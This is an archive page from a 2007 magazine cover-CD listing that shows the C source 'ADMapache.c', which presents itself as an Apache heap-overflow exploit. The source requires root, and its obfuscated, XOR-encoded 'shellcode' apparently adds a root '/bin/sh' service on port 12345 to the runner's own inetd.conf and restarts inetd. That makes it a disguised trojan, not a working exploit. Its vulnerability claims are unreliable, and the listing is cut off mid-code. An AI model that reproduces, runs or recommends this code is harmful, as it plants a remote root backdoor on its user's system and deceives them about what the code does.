Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / ADMapache.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 4KB | 92 lines

/* * ADM CONFIDENTIAL -- (ADM Confidential Restricted when * * combined with the aggregated modules for this product) * * OBJECT CODE ONLY SOURCE MATERIALS * * (C) COPYRIGHT ADM Crew. 2000 * * ALL RIGHTS RESERVED * * * * This module may not be used, published, distributed, or * * archived without the written permission of the ADM Crew. * * * * * * Title: ADMapache.c (ADM Linux Apache.c (x86)) * * Tested: Redhat Apache 1.3.9, Slack Apache 1.3.12 * * Author: plaguez * * Synopsis: * * Apache has gone to great lengths to prevent * * the stack from being smashed, but for some * * odd reason, checking for the BBS segment of * * memory being "redirected" had been neglected * * to be checked. The problem lies within the * * POST directive processer in the apache module * * controler. * * * * Usage: * * compile with "gcc -o ADMapache ADMapache.c * * "./ADMapache <offset> | nc targethost 80" * * offset between 423-443 should work. * * * */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> #include <sys/types.h> #define ERROR -1 #define BUFSIZE 5096 #define offset "326" #define r00t "0" unsigned char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31\xc9\x66\xb9\x1c\x01" "\x80\x36\x03\x46\xe2\xfa\xe8\x58\x2c\x61\x6a\x6d\x2c\x68\x6a\x6f\x6f\x62\x6f" "\x6f\x03\x2e\x4b\x56\x53\x03\x6a\x6d\x66\x77\x67\x03\x8e\xb5\x03\x03\x03\x03" "\x32\x37\x36\x36\x36\x23\x70\x77\x71\x66\x62\x6e\x23\x77\x60\x73\x23\x6d\x6c" "\x74\x62\x6a\x77\x23\x71\x6c\x6c\x77\x23\x2c\x61\x6a\x6d\x2c\x70\x6b\x23\x2c" "\x61\x6a\x6d\x2c\x70\x6b\x03\x2c\x66\x77\x60\x2c\x6a\x6d\x66\x77\x67\x2d\x60" "\x6c\x6d\x65\x03\x82\xef\x64\x28\x03\x03\x93\x56\x8a\xe6\x80\xef\x1f\x54\x55" "\x50\xeb\x03\x03\x03\x03\x58\x82\xc0\x1d\x12\x03\x03\x8e\x80\x71\xed\xfc\xfc" "\x8a\x46\xef\x8a\x46\xf3\x8e\x90\x7c\xed\xfc\xfc\x8a\x56\xf7\x8e\x88\x87\xed" "\xfc\xfc\x8a\x4e\xfb\xc4\x46\xff\x03\x03\x03\x03\x8e\xb0\x93\xed\xfc\xfc\x8a" "\x76\xeb\x8e\xb8\xbe\xed\xfc\xfc\xbb\x06\x03\x03\x03\x8a\xfd\xba\x01\x07\x03" "\x03\xb9\xee\x02\x03\x03\x50\x8a\xf0\xce\x83\x8a\xc4\xbb\x2a\x03\x03\x03\x8a" "\xfd\x50\x8a\xf0\xce\x83\x8a\x46\xe7\xbb\x07\x03\x03\x03\x88\x76\xe7\x88\x4e" "\xeb\xb9\x2f\x03\x03\x03\x50\x8a\xf0\xce\x83\xbb\x05\x03\x03\x03\x50\x8a\xf0" "\xce\x83\xbb\x05\x03\x03\x03\x8a\xfd\x50\x8a\xf0\xce\x83\x8e\x7e\xf3\xbb\x08" "\x03\x03\x03\x88\x76\xef\x8a\xfa\x32\xd1\x50\x8a\xf0\xce\x83\x8e\x66\xdb\x58" "\x5d\x5c\xca\xc0\x93"; u_long getesp() { __asm__("movl %esp,%eax"); /* set sp as ret.addr for reference */ } int main(int argc, char **argv) { register int i; u_long sysaddr; int (*q)(); int *uid; char buf[BUFSIZE + sizeof(u_long) + 1]; if (getuid() != 0) { puts("[Apache heap overflow by plaguez, ADM Crew]"); puts("root is neccesary so we can access higher memory addresses."); exit(0); } if(argc <= 1) { fprintf(stderr,"[Apache heap overflow by plaguez, ADM Crew]\n"); fprintf(stderr,"Usage: %s <offset> | nc <victim> 80\n",argv[0]); return(ERROR); } sysaddr = getesp() + atoi(argv[1]); memset(buf, 'A', BUFSIZE + sizeof(u_long)); /* gotta love those x41's */ q = shellcode; /* reverse byte order */ for(i = 0; i < sizeof(sysaddr); i++) buf[B